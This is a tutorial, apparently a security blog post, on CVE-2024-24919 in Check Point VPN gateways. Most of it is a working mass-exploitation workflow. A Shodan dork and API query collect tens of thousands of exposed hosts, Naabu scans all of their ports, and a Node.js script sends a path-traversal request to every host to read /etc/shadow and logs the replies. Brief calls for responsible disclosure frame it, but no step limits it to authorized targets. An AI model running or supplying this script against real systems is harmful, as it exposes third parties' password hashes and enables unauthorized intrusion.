How to test for CVE-2024-24919
Please ensure that testing for these types of issues is conducted responsibly, and assist companies in addressing and resolving their security vulnerabilities.
What is CVE-2024-24919?
CVE-2024-24919 is a high-severity vulnerability affecting Check Point Security Gateways, particularly those with the Remote Access VPN or Mobile Access Software Blades enabled. It allows an attacker to read certain information on an affected gateway if the gateway is reachable from the internet. Exploiting the flaw leads to information disclosure, which can be critical depending on the nature of the information accessed.
Check Point has released a security fix for this vulnerability, and users are strongly encouraged to apply it to protect their systems (Tenable, MITRE CVE).
The vulnerability has been actively exploited in the wild, so administrators should address it promptly to prevent unauthorized access and potential data breaches (Tenable). For more details and the security patch, see the official Check Point support page (MITRE CVE).
We use Shodan with the dork below to find potentially affected hosts.
Type the following into the Shodan search box: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
1. Check Point Software:
The "Server: Check Point SVN" part identifies the server software as Check Point's SVN Foundation, which is likely used for internal version control within Check Point.
2. Compatibility Mode:
The "X-UA-Compatible: IE=EmulateIE7" part indicates the server is configured to render pages in a mode compatible with Internet Explorer 7, an older browser. This could be because the server software itself is older, or because it serves a specific application that relies on older functionality.
Results in Shodan
You can see more than 30,000 results.
To fetch all the hosts with a script, you can use the Shodan search API (substitute your own API key for the placeholder):
https://api.shodan.io/shodan/host/search?key=YOUR_SHODAN_API_KEY&query={query}&facets={facets}
Once you have filtered the host names from the Shodan results, use Naabu to scan their ports:
naabu -list 1.txt -p 1-65535 -o naabu_output.txt
Now use the script below to run a curl command against every host Naabu found and record the results.
const { exec } = require('child_process');
const fs = require('fs');

// Create a write stream to a .txt file ('a' flag for append mode)
const outputStream = fs.createWriteStream('output.txt', { flags: 'a' });

// Execute the curl command for one host (ip or ip:port, as written by naabu)
function executeCurl(ip) {
  // exec() runs the command through /bin/sh, which does not understand bash's
  // $'...' quoting (it breaks on dash), so plain single quotes are used here.
  const curlCommand = `curl --path-as-is -i -s -k -X 'POST' \
    -H 'Host: ${ip}' -H 'Content-Length: 39' -H 'Connection: keep-alive' \
    --data-binary 'aCSHELL/../../../../../../../etc/shadow' \
    'https://${ip}/clients/MyCRL'`;

  exec(curlCommand, (error, stdout, stderr) => {
    if (error) {
      console.error(`Error executing curl for IP ${ip}: ${error.message}`);
      return;
    }
    if (stderr) {
      console.error(`stderr executing curl for IP ${ip}: ${stderr}`);
      return;
    }
    const output = `Response for IP ${ip}:\n${stdout}`;
    console.log(output);
    outputStream.write(output + '\n'); // Write output to the file
  });
}

// Read hosts from naabu_output.txt (the file written by the naabu command above)
// and execute the curl command for each one
fs.readFile('naabu_output.txt', 'utf8', (err, data) => {
  if (err) {
    console.error(`Error reading file: ${err}`);
    return;
  }
  const ips = data.trim().split('\n').map(l => l.trim()).filter(Boolean);
  ips.forEach(ip => {
    executeCurl(ip);
  });
});
Fire up Burp and reproduce the automated finding manually.
Alternatively, you can also use the Nuclei template.
Make sure you responsibly disclose these issues to the organization, and make sure to give a tweet.
Robin Joseph
Head of Security testing